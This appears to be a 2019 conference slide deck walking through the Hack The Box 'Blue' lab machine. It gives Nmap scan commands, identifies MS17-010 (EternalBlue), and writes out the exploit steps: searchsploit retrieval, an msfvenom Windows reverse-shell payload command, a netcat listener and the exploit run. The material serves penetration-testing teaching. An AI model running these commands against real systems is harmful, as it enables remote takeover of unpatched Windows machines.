Nous Sommes Cyber - HTB Blue
- 1. WE ARE CYBER/NOUS SOMMES CYBER MONTREAL 2019 PRESENTED BY DIANA WHITNEY HTB : BLUE
- 2. WHOAMI • Diana Whitney • IT Security Specialist at EWA-Canada since 2015 • Payment Assurance Lab – PCI PTS POI Standards testing • Secure That Cert! CySA+ and PenTest+
- 3. WHAT WILL WE COVER? • Quick intro to Hack the Box and the Blue machine • Reconnaissance • Vulnerability Identification • Exploitation • Walkthrough demo
- 4. • https://www.hackthebox.eu/ • Deliberately vulnerable machines • Each one has a unique exploit – test your skills against it • CVEs • Enumeration • Real-Life • CTF-Like • Custom Exploitation
- 6. RECONNAISSANCE • Gather information about our target • Open ports – TCP and UDP • Service identification • Operating System • Service/OS Versions • We will be using Nmap
- 7. NMAP • Free but powerful tool • Host discovery • Network mapping • Port scanning • Version and OS detection • Customizable scans using Nmap Scripting Engine (NSE) • Command line and GUI (Zenmap) versions • Many cheat sheets are available online
- 8. RECONN WITH NMAP • nmap -sC -sV -O -oA initial 10.10.10.40 • -sC scans the target using the default Nmap scripts • -sV attempts to identify the version of services found running on open ports • -O attempts to ID the host’s operating systems • -oA outputs the scan results into a file called ‘initialscan’ • 10.10.10.40 is our target
- 9. • Port 139 is open and running netbios-ssn • Port 445 is running Microsoft-ds • Ports 135, 49152-7 are running msrpc
- 10. Our scripts used the SMB protocol running on the open ports to lea more about the host: • OS – Windows 7 Pro • Security mode
- 11. MORE NMAP • Initial scan only scans the top 1000 ports • Adding -p- to the command tells nmap to scan all 65535 ports • To scan UDP ports instead of TCP ports • nmap -sU -O -p- -oA udpfull 10.10.10.40
- 12. NMAP VULNERABILITY SCRIPTS • nmap --script vuln -oA vulnerabilities –p 139,445 10.10.10.40 • Previous scan used nmap’s default scripts – fast and non invasive • Vulnerability scripts will look for any potential exploits on the open ports • Can be extra slow – scan specific ports using -p
- 13. • Script smb-vuln-ms17-010 returned a positive result • Code execution vulnerability in MS SMBv1 servers • ID ms17-010 is also known as CVE-2017-0143 - EternalBlue
- 14. • Developed by the NSA and leaked by Shadow Brokers hacker group in 2017 • Exploits SMBv1, a protocol that allows Windows-based computers on a local network to share files easily • Allows a remote attacker to execute arbitrary code on a vulnerable machine by sending specially crafted packets • Used in the WannaCry and NotPetya ransomware attacks of 2017 • CVE-2017-0143
- 15. AWESOME, LET’S EXPLOIT IT! • Search for available, ‘pre-made’ exploits • ExploitDB - https://github.com/offensive-security/exploitdb • Git repository of exploits maintained by Offensive Security • Searchsploit is a command line search tool for Exploit-DB • Search available exploits based off the vulnerability’s ID
- 16. • searchsploit --id ms17-010
- 17. • searchsploit -m 42315 • Mirrors the exploit onto our machine • 42315.py
- 18. LET’S EXAMINE THE CONTENTS OF 42315.PY… • There will be a function call for ‘mysmb’ • We can get it from the provided URL using wget
- 19. • File will be saved as 42315.py.1, since we already have a 42315.py • Change the filename: • mv 42315.py.1 mysmb.py
- 20. • The script requires credentials in order to exploit the target • We find them using enum4linux • Since ‘none’ is an option, we can assume this machine allows us to log in with no username or password.
- 21. • Last we need to modify the python code to add a payload • This will be the executable file we send to the target machine and have it run • To gain access to the target, we’ll send a payload that will set up a reverse shell request • Generate the payload using MSFVenom
- 22. • msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.x LPORT=4444 > eternalblue.exe • https://redteamtutorials.com/2018/10/24/msfvenom- cheatsheet/ • -p – our payload – windows/shell_reverse_tcp • -f format – exe • LHOST – the IP address of our attack machine (local host) – 10.10.14.7 • Your IP address can be found on HTB ‘Access’ page, or by running ifconfig • LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for anything else • eternalblue.exe – the executable file generated by this command
- 23. • Alter the script to send eternalblue.exe from its location on the host machine to the target machine • Script will then execute eternalblue.exe on the target machine
- 24. • Use Netcat to set up a listener on the attacking machine • nc -nvlp 4444 • The attack machine is now listening for an incoming request from the target machine • Now run the python script • python 42315.py 10.10.10.40
- 25. WHEN the python script runs successfully, the reverse shell request will be by the attack machine. We now have access to the target. Run ‘whoami’ in No privilege escalation required – EternalBlue has granted us system ac
Editor's Notes
- #5: Retired vs Live
- #13: Goes through a list of known vulnerabilities Runs checks for those vulnerabilities against the specified ports
- #14: https://nmap.org/nsedoc/scripts/smb-vuln-ms17-010.html
- #21: Enum4linux is a reconnaissance tool for enumerating information from Windows and Samba systems -a Does all simple enumeration Userlists Password policy information Group and member list OS information Cheat sheets
- #22: MSFVenom is a powerful too for payload generation and encoding
- #25: We sent our victim a script that, when run on the target, will send a request back to our machine to open a shell. We need to make sure our machine is listening on the port we put into the script N – No DNS lookups on the other machine’s name V – Verbose, inform us of successful connection L – Listen harder! Makes Netcat start listening again after a client disconnects P – Local port